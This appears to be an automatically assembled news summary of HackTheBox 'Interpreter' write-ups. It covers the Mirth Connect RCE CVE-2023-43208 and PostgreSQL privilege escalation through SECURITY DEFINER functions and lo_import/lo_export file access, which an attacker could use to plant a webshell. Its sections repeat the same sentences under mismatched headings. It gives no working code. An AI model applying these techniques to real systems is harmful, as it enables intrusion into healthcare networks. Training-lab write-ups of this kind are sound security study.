Write-ups Emerge for HackTheBox 'Interpreter'
What happened
Multiple users have successfully compromised the medium-difficulty "Interpreter" machine on the HackTheBox platform. Published write-ups detail an attack path that involves exploiting a vulnerable Mirth Connect instance and performing deep PostgreSQL enumeration. The challenge requires chained attacks and creative pivoting to achieve privilege escalation.
Why it matters
- The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8. This vulnerability stems from an incomplete patch for a previous issue (CVE-2023-37679) and allows attackers to execute arbitrary code without needing any credentials. - The vulnerability in Mirth Connect is due to the insecure use of the XStream library for deserializing XML payloads, which can be triggered by a specially crafted HTTP request. Exploitation is considered straightforward, and public proof-of-concept exploits are available. - Mirth Connect is a widely used open-source data integration platform in the healthcare industry, making its vulnerabilities particularly high-impact. A compromised Mirth Connect server, which often runs with high privileges like SYSTEM on Windows, can serve as a pivot point into a healthcare network. - After gaining initial access, penetration testers would typically perform enumeration of the internal network and services. On the "Interpreter" machine, this leads to the discovery of a PostgreSQL database instance. - PostgreSQL enumeration involves identifying databases, schemas, tables, and user roles to find sensitive data or potential privilege escalation paths. Tools like `psql` and scripts from frameworks such as Metasploit can be used to connect to the database and probe for weaknesses. - A common PostgreSQL privilege escalation technique involves exploiting misconfigured user permissions or functions. For instance, if a low-privileged user can execute functions with the privileges of a superuser (a `SECURITY DEFINER` function), they may be able to gain full control of the database. - Another vector for privilege escalation in PostgreSQL can be the ability to read or write to arbitrary files on the underlying operating system through specific functions like `lo_import` and `lo_export`. This could allow an attacker to read sensitive configuration files or write a webshell to gain further access. - The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
Key numbers
- - The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8.
- This vulnerability stems from an incomplete patch for a previous issue (CVE-2023-37679) and allows attackers to execute arbitrary code without needing any credentials.
- The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
What happens next
- The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8.
- For instance, if a low-privileged user can execute functions with the privileges of a superuser (a SECURITY DEFINER function), they may be able to gain full control of the database.
- This could allow an attacker to read sensitive configuration files or write a webshell to gain further access.
Quick answers
What happened in Write-ups Emerge for HackTheBox 'Interpreter'?
Multiple users have successfully compromised the medium-difficulty "Interpreter" machine on the HackTheBox platform. Published write-ups detail an attack path that involves exploiting a vulnerable Mirth Connect instance and performing deep PostgreSQL enumeration. The challenge requires chained attacks and creative pivoting to achieve privilege escalation.
Why does Write-ups Emerge for HackTheBox 'Interpreter' matter?
The initial exploit likely targets CVE-2023-43208, a critical unauthenticated remote code execution vulnerability in Mirth Connect with a CVSS score of 9.8. This vulnerability stems from an incomplete patch for a previous issue (CVE-2023-37679) and allows attackers to execute arbitrary code without needing any credentials. The vulnerability in Mirth Connect is due to the insecure use of the XStream library for deserializing XML payloads, which can be triggered by a specially crafted HTTP request. Exploitation is considered straightforward, and public proof-of-concept exploits are available. Mirth Connect is a widely used open-source data integration platform in the healthcare industry, making its vulnerabilities particularly high-impact. A compromised Mirth Connect server, which often runs with high privileges like SYSTEM on Windows, can serve as a pivot point into a healthcare network. After gaining initial access, penetration testers would typically perform enumeration of the internal network and services. On the "Interpreter" machine, this leads to the discovery of a PostgreSQL database instance. PostgreSQL enumeration involves identifying databases, schemas, tables, and user roles to find sensitive data or potential privilege escalation paths. Tools like psql and scripts from frameworks such as Metasploit can be used to connect to the database and probe for weaknesses. A common PostgreSQL privilege escalation technique involves exploiting misconfigured user permissions or functions. For instance, if a low-privileged user can execute functions with the privileges of a superuser (a SECURITY DEFINER function), they may be able to gain full control of the database. Another vector for privilege escalation in PostgreSQL can be the ability to read or write to arbitrary files on the underlying operating system through specific functions like lo_import and lo_export. This could allow an attacker to read sensitive configuration files or write a webshell to gain further access. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog in May 2024, indicating active exploitation in the wild by threat actors, including state-sponsored groups.
